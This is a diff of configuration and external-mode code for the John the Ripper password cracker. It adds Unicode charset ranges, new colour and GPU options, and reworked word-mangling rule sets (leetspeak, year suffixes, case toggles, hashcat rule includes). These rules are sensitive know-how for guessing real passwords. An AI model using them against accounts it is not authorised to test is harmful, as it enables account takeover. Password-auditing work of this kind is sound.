-	while (c <= 0x1fad6)	// ..to TEAPOT
+	c = 0x1fadf;		// from SPLATTER
+	while (c <= 0x1fae9)	// ..to FACE WITH BAGS UNDER EYES
+		charset[i++] = c++;
+	c = 0x1faf0;		// from HAND WITH INDEX FINGER AND THUMB CROSSED
+	while (c <= 0x1faf8)	// ..to RIGHTWARDS PUSHING HAND
 		charset[i++] = c++;
 // 1FB00..1FBFF; Symbols for Legacy Computing
 	c = 0x1fb00;		// from BLOCK SEXTANT-1
 	while (c <= 0x1fb92)	// ..to UPPER HALF INVERSE MEDIUM SHADE AND LOWER HALF BLOCK
 		charset[i++] = c++;
 	c = 0x1fb94;		// from LEFT HALF INVERSE MEDIUM SHADE AND RIGHT HALF BLOCK
-	while (c <= 0x1fbca)	// ..to WHITE UP-POINTING CHEVRON
-		charset[i++] = c++;
-	c = 0x1fbf0;		// from SEGMENTED DIGIT ZERO
 	while (c <= 0x1fbf9)	// ..to SEGMENTED DIGIT NINE
 		charset[i++] = c++;
 // 20000..2A6DF; CJK Unified Ideographs Extension B
 	c = 0x20000;		// from <CJK Ideograph Extension B, First>
-	while (c <= 0x2a6dd)	// ..to <CJK Ideograph Extension B, Last>
+	while (c <= 0x2a6df)	// ..to <CJK Ideograph Extension B, Last>
 		charset[i++] = c++;
 // 2A700..2B73F; CJK Unified Ideographs Extension C
 	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
-	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+	while (c <= 0x2b739)	// ..to <CJK Ideograph Extension C, Last>
 		charset[i++] = c++;
 // 2B740..2B81F; CJK Unified Ideographs Extension D
 	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
@@ -2400,6 +2584,10 @@ void init()
 	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
 	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
 		charset[i++] = c++;
+// 2EBF0..2EE5F; CJK Unified Ideographs Extension I
+	c = 0x2ebf0;		// from <CJK Ideograph Extension I, First>
+	while (c <= 0x2ee5d)	// ..to <CJK Ideograph Extension I, Last>
+		charset[i++] = c++;
 // 2F800..2FA1F; CJK Compatibility Ideographs Supplement
 	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
 	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
@@ -2408,6 +2596,10 @@ void init()
 	c = 0x30000;		// from <CJK Ideograph Extension G, First>
 	while (c <= 0x3134a)	// ..to <CJK Ideograph Extension G, Last>
 		charset[i++] = c++;
+// 31350..323AF; CJK Unified Ideographs Extension H
+	c = 0x31350;		// from <CJK Ideograph Extension H, First>
+	while (c <= 0x323af)	// ..to <CJK Ideograph Extension H, Last>
+		charset[i++] = c++;
 // E0000..E007F; Tags
 	c = 0xe0020;		// from TAG SPACE
 	while (c <= 0xe007f)	// ..to CANCEL TAG

data/jtr/dynamic.conf

@@ -466,7 +466,7 @@ Test=$dynamic_1014$e463b65f14643afd970c7ea7e7efeb0f$1234567890123456789012345678
 ####################################################################
 # Dynamic type for md5(md5($p.$u).$s) for PostgreSQL 'pass the hash' weakness
 # See also dynamic_1034 for PostgreSQL MD5
-# http://www.openwall.com/lists/oss-security/2015/03/03/12
+# https://www.openwall.com/lists/oss-security/2015/03/03/12
 ####################################################################
 [List.Generic:dynamic_1015]
 Expression=md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')

data/jtr/john.conf

@@ -1,6 +1,6 @@
 #
 # This file is part of John the Ripper password cracker,
-# Copyright (c) 1996-2006,2008-2013,2019 by Solar Designer
+# Copyright (c) 1996-2025 by Solar Designer and others
 #
 # Redistribution and use in source and binary forms, with or without
 # modification, are permitted.
@@ -11,8 +11,6 @@
 # license above, many source files in John the Ripper are under GPLv2.
 # For licensing terms for John the Ripper as a whole, see doc/LICENSE.
 #
-# ...with changes in the jumbo patch, by various authors
-#
 
 # The [Options] section is for general options only.
 # Note that MPI specific options have been moved
@@ -108,23 +106,35 @@ LogDateStderrFormat =
 # parsed as ESC for use in ANSI codes (like in the default)
 TerminalReset = ^[0m
 
+# If this is true, colorize some messages - such as test failures - if stdout
+# is a terminal.
+# The color codes can be redefined here if needed. The ^ character will be
+# parsed as ESC for use in ANSI escape sequences (like in the defaults here,
+# which define red for errors, green for notices and yellow for warnings).
+# Note that you don't strictly need to use ANSI sequences - other things are
+# fine too.
+# Set this to N or comment it out to disable all color stuff.
+UseColors = Y
+ColorError = ^[0;31m
+ColorNotice = ^[0;32m
+ColorWarning = ^[0;33m
+ColorEnd = ^[0m
+
 # This can be used to colorize (on screen) or otherwise emphasize (in log
-# files) output whenever a supposed administrator password gets cracked.
+# files or if stdout is not a terminal) output whenever a supposed
+# administrator password, or some other password, gets cracked.
+#
+# The colors used will be yellow for regular cracks and red for users that we
+# know or guess are admin users (including but not limited to uid 0 or 500,
+# or login 'root' or 'Administrator').
 #
 # Set this to N or comment it out to disable all "MarkAdmin" stuff.
 MarkAdminCracks = Y
+ColorAdmin = ^[0;31m
+ColorCrack = ^[0;33m
 
-# If MarkAdminCracks = Y above, the below will be used (if defined) for
-# terminal output. The default is to change color to red before the username
-# and reset to normal after it. Any "^" characters will be parsed as ESC for
-# use in ANSI codes (like in the defaults).
-# The "MarkOther" entries will make non-admin stuff brown.
-MarkAdminStart = ^[0;31m
-MarkAdminEnd = ^[0m
-MarkOtherStart = ^[0;33m
-MarkOtherEnd = ^[0m
-
-# If MarkAdminCracks = Y above, the below will be used (if defined) for logs.
+# If MarkAdminCracks = Y above, the below will be used (if defined) for logs
+# or otherwise where stdout is not a terminal.
 # This literal string will be printed after the " + Cracked: root" line.
 MarkAdminString = (ADMIN ACCOUNT)
 
@@ -173,7 +183,7 @@ SingleWordsPairMax = 6
 
 # Setting this to false stops Single mode from re-testing guessed plaintexts
 # with all other salts.  This is deprecated: Use command-line per-session
-# option --single-retest-guess=no instead.
+# option --no-single-retest-guess instead.
 SingleRetestGuessed = Y
 
 # Max recursion depth for SingleRetestGuessed, so we don't blow the stack
@@ -239,8 +249,22 @@ ShowRemainOnStatus = N
 # Write cracked passwords to the log file (default is just the user name)
 LogCrackedPasswords = N
 
+# Log per-rule statistics usable to generate re-ordered rule set with:
+#  cut -c14- john.log | grep '^Score ' | sort -rnk 2 | cut -d: -f2- | sed 's/\\/\\\\/g; s/\[/\\[/g; s/^-: //'
+# or for use on the slowest hashes:
+#  cut -c14- john.log | grep '^Score ' | sort -nk 4 | cut -d: -f2- | sed 's/\\/\\\\/g; s/\[/\\[/g; s/^-: //'
+# The "sed" invocation in these commands is to make the pre-processed rules
+# suitable for our rule preprocessor again.  It should be omitted for
+# re-ordering hashcat mode rule sets, because that mode disables the
+# preprocessor.  And yes, you cannot use these commands for re-ordering mixed
+# JtR native and hashcat mode rule sets, such as our Jumbo rule set, which
+# currently includes hashcat's best64.  That's not only because of the
+# preprocessor, but also because hashcat mode on/off would get misplaced.
+# Please note that enabling this option has some performance impact.
+PerRuleStats = N
+
 # Disable the dupe checking when loading hashes. For testing purposes only!
-# This is deprecated: Use per-session option --loader-dupecheck=no instead.
+# This is deprecated: Use per-session option --no-loader-dupe-check instead.
 NoLoaderDupeCheck = N
 
 # Default encoding for input files (ie. login/GECOS fields) and wordlists
@@ -350,6 +374,17 @@ AbortGraceTime = 30
 # This may produce some false positives if enabled, at least for SAP-B.
 SAPhalfHashes = N
 
+# Opportunistic duplicate candidate password suppressor for wordlist+rules
+[Options:Suppressor]
+# Memory allocation size in MiB per process, 0 to disable unless forced.
+# The default is 256 MiB, the maximum is just below 256 GiB (on 64-bit).
+Size = 256
+
+# Whether to lock the oldest half of entries as write-once (and only ever
+# update the other half).  Empirically, this often provides best results,
+# but it can also backfire.  The default is yes.
+LockHalf = Y
+
 [Options:CPUtune]
 # If preset is given, use it and skip autotune (NOTE: non-intel archs will
 # currently ignore this option and always autotune)
@@ -395,7 +430,22 @@ AbortTemperature = 95
 # interpret as intent to keep the GPU temperature around the limit.
 SleepOnTemperature = 1
 
+# Enable a workaround for busy-waits, introducing calls to usleep(3).  This
+# currently only applies to some formats on NVIDIA GPUs under Linux.
+AvoidBusyWait = Y
+
 [Options:OpenCL]
+# Mute buggy nvidia warnings about kernel overriding noinline
+# attribute. Even with this set, they will show at "debug verbosity"
+# as in --verbose:6.
+MuteBogusWarnings = Y
+
+# Add ptxas info (-cl-nv-verbose) to build options for nvidia
+NvidiaShowPtxas = Y
+
+# Show runtime build warnings regardless of verbosity.
+AlwaysShowBuildWarnings = N
+
 # Set default OpenCL device(s). Command line option will override this.
 # If not set, we will search for a GPU or fall-back to the most
 # powerful device.  Syntax is same as --device option.
@@ -722,7 +772,6 @@ DefaultCharset =
 -c /?d @?d >3 M [lc] Q Az"123" <+
 /?d @?d >2 al d
 -c /?d @?d >2 al M [lc] Q d
-(?a )?d /?d a0 'p Xpz0
 )?a (?d /?a a0 'p Xpz0
 
 # "Single crack" mode rules
@@ -730,11 +779,17 @@ DefaultCharset =
 # Simple rules come first...
 :
 -s x**
+<* $1
 -c (?a c Q
--c l Q
+(?a )?d /?d a0 'p Xpz0
+<* $[230754968]
+-c [lu] Q
 -s-c x** /?u l
-# These were not included in crackers I've seen, but are pretty efficient,
-# so I include them near the beginning
+Az"123" <+
+r c
+-c )?a r l
+<* $!
+<* p
 -<6 >6 '6
 -<7 >7 '7 l
 -<6 -c >6 '6 /?u l
@@ -746,12 +801,9 @@ DefaultCharset =
 # Weird order, eh? Can't do anything about it, the order is based on the
 # number of successful cracks...
 <* d
-r c
 -c <* (?a d c
 -<5 -c >5 '5 /?u l
--c u Q
--c )?a r l
--[:c] <* !?A \p1[lc] p
+-c <* [lc] Q p
 -c <* c Q d
 -<7 -c >7 '7 /?u
 -<4 >4 '4 l
@@ -779,51 +831,49 @@ r c
 # >4 x32 /?u l ... >9 x37 /?u l
 -c >[4-9] x3\p[2-7] /?u l
 # Now to the suffix stuff...
-<* l $[1-9!0a-rt-z"-/:-@\[-`{-~]
--c <* (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
--[:c] <* !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
--[:c] <* /?A (?\p1[za] \p1[lc] $s
-<* l r $[1-9!]
--c <* /?a u $[1-9!]
--[:c] <- (?\p1[za] \p1[lc] Az"'s"
--[:c] <- (?\p1[za] \p1[lc] Az"!!"
--[:c] (?\p1[za] \p1[lc] $! <- Az"!!"
+-c <* [lc] Q $[1230754968!]
+-\r[:cc] <* \p1[:lc] \r\p1[:QQ] $[a-rt-z"-/:-@\[-`{-~]
+-[:c] <* (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
+<* l r $[1230754968!]
+-c <* /?a u $[1230754968!]
+-\r[:cc] <- \p1[:lc] \r\p1[:QQ] Az"'s"
+-\r[:cc] <- \p1[:lc] \r\p1[:QQ] Az"!!"
+-\r[:cc] <- \p1[:lc] \r\p1[:QQ] $! <- Az"!!"
 # Removing vowels...
--[:c] /?v @?v >2 (?\p1[za] \p1[lc]
+-\r[:cc] /?v @?v >2 M \p1[:lc] \r\p1[:QQ]
 /?v @?v >2 <* d
 # crack -> cracked, crack -> cracking
-<* l [PI]
--c <* l [PI] (?a c
+-\r[:cc] <* \p1[:lc] \r\p1[:QQ] [PI]
 # mary -> marie
--[:c] <* (?\p1[za] \p1[lc] )y omi $e
+-\r[:cc] <* \p1[:lc] \r\p1[:QQ] )y omi $e
 # marie -> mary
--[:c] (?\p1[za] \p1[lc] )e \] <+ )i val1 oay
+-\r[:cc] <* \p1[:lc] \r\p1[:QQ] )e \] <+ )i val1 oay
 # The following are some 3l33t rules
--[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
--[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
--[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
--[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
--[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
--[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
--[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
--[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
--[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
--[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
--[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
--[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
--[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
--[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /o /s so0 ss$ (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
 # Now to the prefix stuff...
 l ^[1a-z2-90]
 -c l Q ^[A-Z]
 ^[A-Z]
 l ^["-/:-@\[-`{-~]
--[:c] <9 (?a \p1[lc] A0"[tT]he"
--[:c] <9 (?a \p1[lc] A0"[aA]my"
--[:c] <9 (?a \p1[lc] A0"[mdMD]r"
--[:c] <9 (?a \p1[lc] A0"[mdMD]r."
--[:c] <9 (?a \p1[lc] A0"__"
-<- !?A l p ^[240-9]
+-[:c] <9 (?\p1[za] \p1[lc] A0"[tT]he"
+-[:c] <9 (?\p1[za] \p1[lc] A0"[aA]my"
+-[:c] <9 (?\p1[za] \p1[lc] A0"[mdMD]r"
+-[:c] <9 (?\p1[za] \p1[lc] A0"[mdMD]r."
+-[:c] <9 (?\p1[za] \p1[lc] A0"__"
+<- l p ^[240-9]
 # Some word pair rules...
 # johnsmith -> JohnSmith, johnSmith
 -p-c (?a 2 (?a c 1 [cl]
@@ -841,8 +891,8 @@ l ^["-/:-@\[-`{-~]
 -p-[c:] 1 l 2 \p1[ur]
 -p-c 1 (?a c 2 [ur]
 # jsmith -> smithj, etc...
--[:c] (?a \p1[lc] [{}]
--[:c] (?a \p1[lc] [{}] \0
+-\r[:cc] \p1[:lc] \r\p1[:QQ] [{}]
+-\r[:cc] \p1[:lc] \r\p1[:QQ] [{}] \0
 # Toggle case...
 -c <+ )?u l Tm
 -c T0 Q M c Q l Q u Q C Q X0z0 'l
@@ -858,14 +908,11 @@ l ^["-/:-@\[-`{-~]
 =1?a \[ M c Q
 -c (?a >[1-9A-E] D\1 c
 # Inserting a dot...
--[:c] >3 (?a \p1[lc] i[12].
+-\r[:cc] >3 \p1[:lc] \r\p1[:QQ] i[12].
 # More suffix stuff...
-<- l Az"[190][0-9]"
--c <- (?a c Az"[190][0-9]"
-<- l Az"[782][0-9]"
--c <- (?a c Az"[782][0-9]"
-<* l $[A-Z]
--c <* (?a c $[A-Z]
+-\r[:cc] <- \p1[:lc] \r\p1[:QQ] Az"[190][0-9]"
+-\r[:cc] <- \p1[:lc] \r\p1[:QQ] Az"[782][0-9]"
+-\r[:cc] <* \p1[:lc] \r\p1[:QQ] $[A-Z]
 # cracking -> CRACKiNG
 -c u /I sIi
 # Crack96 -> cRACK96
@@ -880,33 +927,32 @@ l Q [RL]
 -c (?a c Q [RL]
 :[RL] \0 Q
 # Both prefixing and suffixing...
-<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
+<- l ^[10-9!@#$%^&*\-=_+.?|:'"] $\0
 <- l ^[({[<] $\p[)}\]>]
 # The rest of two-digit suffix stuff, less common numbers...
-<- l Az"[63-5][0-9]"
--c <- (?a c Az"[63-5][0-9]"
+-\r[:cc] <- \p1[:lc] \r\p1[:QQ] Az"[63-5][0-9]"
 # Some multi-digit numbers...
--[:c] (?a \p1[lc] Az"007" <+
--[:c] (?a \p1[lc] Az"123" <+
--[:c] (?a \p1[lc] Az"[0-9]\0\0" <+
--[:c] (?a \p1[lc] Az"1234" <+
--[:c] (?a \p1[lc] Az"[0-9]\0\0\0" <+
--[:c] (?a \p1[lc] Az"12345" <+
--[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0" <+
--[:c] (?a \p1[lc] Az"123456" <+
--[:c] (?a \p1[lc] Az"[0-9]\0\0\0\0\0" <+
+-c [lc] Q Az"123" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"007" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"[0-9]\0\0" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"1234" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"[0-9]\0\0\0" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"12345" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"[0-9]\0\0\0\0" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"123456" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"[0-9]\0\0\0\0\0" <+
 # Some [birth] years...
-l Az"19[7-96-0]" <+ >-
-l Az"20[012]" <+ >-
-l Az"19[7-9][0-9]" <+
-l Az"20[012][0-9]" <+
-l Az"19[6-0][9-0]" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"19[7-96-0]" <+ >-
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"20[012]" <+ >-
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"19[7-9][0-9]" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"20[012][0-9]" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"19[6-0][9-0]" <+
 
 [List.Rules:Extra]
-# Insert/overstrike some characters...
-!?A >[1-6] l i\0[a-z]
-!?A l o0[a-z]
-!?A >[1-7] l o\0[a-z]
+# Overstrike/insert some characters...
+o0[a-z10-9A-Z] Q
+>[1-7] o\0[a-z10-9_@.\-#!] Q
+>[1-6] i\0[a-z10-9_@.\-# ]
 # Toggle case everywhere (up to length 8), assuming that certain case
 # combinations were already tried.
 -c T1 Q M T0 Q
@@ -917,13 +963,20 @@ l Az"19[6-0][9-0]" <+
 -c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
 -c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
 # Very slow stuff...
-l Az"[1-90][0-9][0-9]" <+
--c (?a c Az"[1-90][0-9][0-9]" <+
+-\r[:cc] \p1[:lc] \r\p1[:QQ] Az"[1-90][0-9][0-9]" <+
 <[\-9] l A\p[z0]"[a-z][a-z]"
+<- l ^[A-Z] $\0
 <- l ^[a-z] $[a-z]
 
-# Wordlist mode rules
+.include <rules-by-score.conf>
+.include <rules-by-rate.conf>
+
+# New default wordlist mode rules
 [List.Rules:Wordlist]
+.include [List.Rules:Best-by-score]
+
+# Former default wordlist mode rules, now usable to enforce a policy
+[List.Rules:Policy]
 # Try words as they are
 :
 # Lowercase every pure alphanumeric word
@@ -1094,39 +1147,78 @@ s[ ][,&+*!'$/?:=#~] Q
 :
 ->F -<F >F 'F
 
-# Rules from Hash Runner 2014
+# Overstrike/insert rules originally from Hash Runner 2014
+
+# Overstrike any one character
 [List.Rules:o1]
-# o[0-9A-Z][ -~]
+# Trivial
+#o[0-9A-Z][ -~]
+# Optimized
 ->\r[1-9A-ZZ] >\p[0-9A-Z] o\0[ -~] Q
 
+# Overstrike any two characters
 [List.Rules:o2]
-# o[0-9A-E][ -~] Q M o[0-9A-E][ -~] Q
-->[1-9A-F] ->[1-9A-F] >\p1[0-9A-E] >\p2[0-9A-E] o\3[ -~] Q M o\4[ -~] Q
-
-[List.Rules:o3]
-# o[0-9][ -~] Q M o[0-9][ -~] Q M o[0-9][ -~] Q
-->[1-9A] ->[1-9A] ->[1-9A] >\p1[0-9] >\p2[0-9] >\p3[0-9] o\4[ -~] Q M o\5[ -~] Q M o\6[ -~] Q
+# Simple
+#o[0-9A-E][ -~] Q M o[0-9A-E][ -~] Q
+# Optimized, assumes we also run o1 separately if needed
+#->[1-9A-F] ->[2-9A-F] >\p1[0-9A-E] >\p2[1-9A-E] o\3[ -~] Q M o\4[ -~] Q
+# Optimized further, same assumption
+->[2-9A-F] >\p[1-9A-E] o0[ -~] Q M o\2[ -~] Q
+->[3-9A-F] >\p[2-9A-E] o1[ -~] Q M o\2[ -~] Q
+->[4-9A-F] >\p[3-9A-E] o2[ -~] Q M o\2[ -~] Q
+->[5-9A-F] >\p[4-9A-E] o3[ -~] Q M o\2[ -~] Q
+->[6-9A-F] >\p[5-9A-E] o4[ -~] Q M o\2[ -~] Q
+->[7-9A-F] >\p[6-9A-E] o5[ -~] Q M o\2[ -~] Q
+->[8-9A-F] >\p[7-9A-E] o6[ -~] Q M o\2[ -~] Q
+->[9A-F] >\p[8-9A-E] o7[ -~] Q M o\2[ -~] Q
+->[A-F] >\p[9A-E] o8[ -~] Q M o\2[ -~] Q
+->[B-F] >\p[A-E] o9[ -~] Q M o\2[ -~] Q
+->[C-F] >\p[B-E] oA[ -~] Q M o\2[ -~] Q
+->[D-F] >\p[C-E] oB[ -~] Q M o\2[ -~] Q
+->[E-F] >\p[D-E] oC[ -~] Q M o\2[ -~] Q
+->F >E oD[ -~] Q M oE[ -~] Q
 
+# Overstrike any one or two characters
 [List.Rules:o]
 .include [List.Rules:o1]
 .include [List.Rules:o2]
 
+# Insert any one character
 [List.Rules:i1]
-# i[0-9A-Z][ -~]
+# Trivial
+#i[0-9A-Z][ -~]
+# Optimized
 ->\r[2-9A-ZZZ] >\p1[0-9A-Z] i\0[ -~]
 
+# Insert any two characters
 [List.Rules:i2]
-# i[0-9A-E][ -~] i[0-9A-E][ -~]
-->[2-9A-G] ->[2-9A-G] >\p1[0-9A-E] >\p2[0-9A-E] i\3[ -~] i\4[ -~]
-
-[List.Rules:i3]
-# i[0-9][ -~] i[0-9][ -~] i[0-9][ -~]
-->[4-9A-D] ->[4-9A-D] ->[4-9A-D] >\p1[0-9] >\p2[0-9] >\p3[0-9] i\4[ -~] i\5[ -~] i\6[ -~]
+# Trivial
+#i[0-9A-E][ -~] i[0-9A-E][ -~]
+# Optimized
+#->[2-9A-G] ->[2-9A-G] i\p1[0-9A-E][ -~] >\3 >\p2[0-9A-E] i\p2[1-9A-F][ -~]
+# Optimized further
+->[2-9A-G] i0[ -~] >\p1[0-9A-E] i\p1[1-9A-F][ -~]
+->[3-9A-G] i1[ -~] >\p1[1-9A-E] i\p1[2-9A-F][ -~]
+->[4-9A-G] i2[ -~] >\p1[2-9A-E] i\p1[3-9A-F][ -~]
+->[5-9A-G] i3[ -~] >\p1[3-9A-E] i\p1[4-9A-F][ -~]
+->[6-9A-G] i4[ -~] >\p1[4-9A-E] i\p1[5-9A-F][ -~]
+->[7-9A-G] i5[ -~] >\p1[5-9A-E] i\p1[6-9A-F][ -~]
+->[8-9A-G] i6[ -~] >\p1[6-9A-E] i\p1[7-9A-F][ -~]
+->[9A-G] i7[ -~] >\p1[7-9A-E] i\p1[8-9A-F][ -~]
+->[A-G] i8[ -~] >\p1[8-9A-E] i\p1[9A-F][ -~]
+->[B-G] i9[ -~] >\p1[9A-E] i\p1[A-F][ -~]
+->[C-G] iA[ -~] >\p1[A-E] i\p1[B-F][ -~]
+->[D-G] iB[ -~] >\p1[B-E] i\p1[C-F][ -~]
+->[E-G] iC[ -~] >\p1[C-E] i\p1[D-F][ -~]
+->[F-G] iD[ -~] >\p1[D-E] i\p1[E-F][ -~]
+->G iE[ -~] >E iF[ -~]
 
+# Insert any one or two characters
 [List.Rules:i]
 .include [List.Rules:i1]
 .include [List.Rules:i2]
 
+# Overstrike or insert any one or two characters
 [List.Rules:oi]
 .include [List.Rules:o1]
 .include [List.Rules:i1]
@@ -1197,6 +1289,24 @@ a0 /?D l sa2 sb2 sc2 sd3 se3 sf3 sg4 sh4 si4 sj5 sk5 sl5 sm6 sn6 so6 sp7 sq7 sr7
 [List.Rules:passphrase-rule2]
 .include <rules/passphrase-rule2.rule>
 
+# These rules are an optimized (large) subset of the hashcat rules
+# https://notsosecure.com/one-rule-to-rule-them-all
+# https://github.com/NotSoSecure/password_cracking_rules
+[List.Rules:OneRuleToRuleThemAll]
+!! hashcat logic ON
+.include <rules/OneRuleToRuleThemAll.rule>
+!! hashcat logic OFF
+
+# These rules are an optimized version of OneRuleToRuleThemAll with removal of
+# rules that were effectively duplicate as well as some that were ineffective.
+# This cracks almost all of the same passwords in ~5% fewer rules.
+# https://in.security/2023/01/10/oneruletorulethemstill-new-and-improved/
+# https://github.com/stealthsploit/OneRuleToRuleThemStill
+[List.Rules:OneRuleToRuleThemStill]
+!! hashcat logic ON
+.include <rules/OneRuleToRuleThemStill.rule>
+!! hashcat logic OFF
+
 # Default Loopback mode rules.
 [List.Rules:Loopback]
 .include [List.Rules:ShiftToggle]
@@ -1219,8 +1329,7 @@ b1 ]
 # For Wordlist mode and very fast hashes
 [List.Rules:Jumbo]
 .include [List.Rules:Single-Extra]
-.include [List.Rules:Wordlist]
-.include [List.Rules:ShiftToggle]
+.include [List.Rules:Policy]
 .include [List.Rules:Multiword]
 .include [List.Rules:best64]
 .include [List.Rules:UnicodeSubstitution]
@@ -1233,9 +1342,12 @@ b1 ]
 # ridiculous quality and lack optimizations - you have been warned.
 [List.Rules:All]
 .include [List.Rules:Jumbo]
-.include [List.Rules:KoreLogic]
+.include [List.Rules:OneRuleToRuleThemStill]
 .include [List.Rules:T9]
 .include [List.Rules:hashcat]
+.include [List.Rules:ShiftToggle]
+.include [List.Rules:oi]
+.include [List.Rules:KoreLogic]
 
 # Incremental modes
 
@@ -1717,9 +1829,9 @@ void restore()
 
 /* Global variables: current length and word */
 /* make this 'long' enough for other externs that include this one */
-/* (up to 125 bytes long) */
+/* (up to 320 bytes long) */
 
-int length, current[126], max;
+int length, current[320], max;
 
 /* this new 'type' variable, is used to tell double what character set to
  * use. It can use the original (alpha).  If type is 0 (i.e. unset), then
@@ -1872,7 +1984,7 @@ void init()
 # sections which include this External_base section.
 # The generate() function will limit the maximum length of generated
 # candidates to either the format's limit (maximum password length)
-# or to the limit specified with --stdout=LENGTH (Default: 125),
+# or to the limit specified with --stdout=LENGTH (Default: 319),
 # thus avoiding duplicate candidates for formats with limited maximum
 # passwortd length.
 # The comparison of the current length and the limit is only done
@@ -1898,7 +2010,7 @@ void generate()
 	c = minc;
 
 	if (++length > maxlength)
-		c = 0; // Will NUL out the next "word" and thus terminate
+		length = 0; // Will NUL out the next "word" and thus terminate
 }
 
 # Try strings of repeated characters (range: space - 0xff).
@@ -1982,7 +2094,7 @@ void init()
 #
 # The generate() function will limit the maximum length of generated
 # candidates to either the format's limit (maximum password length)
-# or to the limit specified with --stdout=LENGTH (Default: 125),
+# or to the limit specified with --stdout=LENGTH (Default: 319),
 # thus avoiding duplicate candidates for formats with limited maximum
 # passwortd length.
 # The comparison of the current length and the limit is only done
@@ -2487,6 +2599,12 @@ void init()
 		}
 	}
 
+	// Must fit in id[] array
+	if (minlength > 15)
+		minlength = 15;
+	if (maxlength > 15)
+		maxlength = 15;
+
 	length = 0;
 	while (length < minlength)
 		id[length++] = 0;
@@ -3791,94 +3909,232 @@ void filter()
 	status = 1;			// Print the status line
 }
 
-#
-# Reference example hybrid-mode external. same as jtr-rule: $[0-9]$[0-9]
-# this format is to be used similar to a filter, in that it requires some
-# other word generator (markov, wordlist, etc).  However, this type external
-# will get new() called with each word, and then have next() called, until
-# the word[0]=0 is seen (meaning all candidates for the base word have been
-# generated.  Prior to new() or restore(), word[] is the 'base' word.
-# if the script is able to properly resume, then it should set the global
-# variable hybrid_total to the count of candidates that will be generated
-# for this word (in new() / restore(), then in the body of restore() there
-# is a global variable set 'hybrid_resume' that was the prior number of
-# canidates generated for this base-word.  Resume should start at the NEXT
-# If the script is not able to easily resume, then simply do NOT set the
-# global hybrid_total to anything either function.  JtR will 'still' resume
-# propery, but it will do so by calling new()/next()/next().../next() until
-# back to the proper resume location.
-#
